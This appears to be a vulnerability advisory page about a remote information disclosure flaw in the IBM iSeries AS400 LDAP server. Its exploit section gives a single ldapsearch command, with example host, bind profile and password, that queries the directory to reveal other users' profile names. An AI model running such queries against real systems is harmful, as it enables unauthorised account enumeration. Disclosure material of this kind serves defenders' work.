IBM iSeries AS400 LDAP Server Remote Information Disclosure Vulnerability

info
discussion
exploit
solution
references

IBM iSeries AS400 LDAP Server Remote Information Disclosure Vulnerability

No exploit is required to leverage this issue. To disclose the users names issue the following command using the 'ldapsearch' utility:

ldapsearch -h as400.example.com -b "cn=accounts,os400-sys=S0011223.example.com" -D "os400-profile=SCARMEL,cn=accounts,os400-sys=S0011223.example.com" -w as400Password -L -s sub "os400-profile=LESLIE"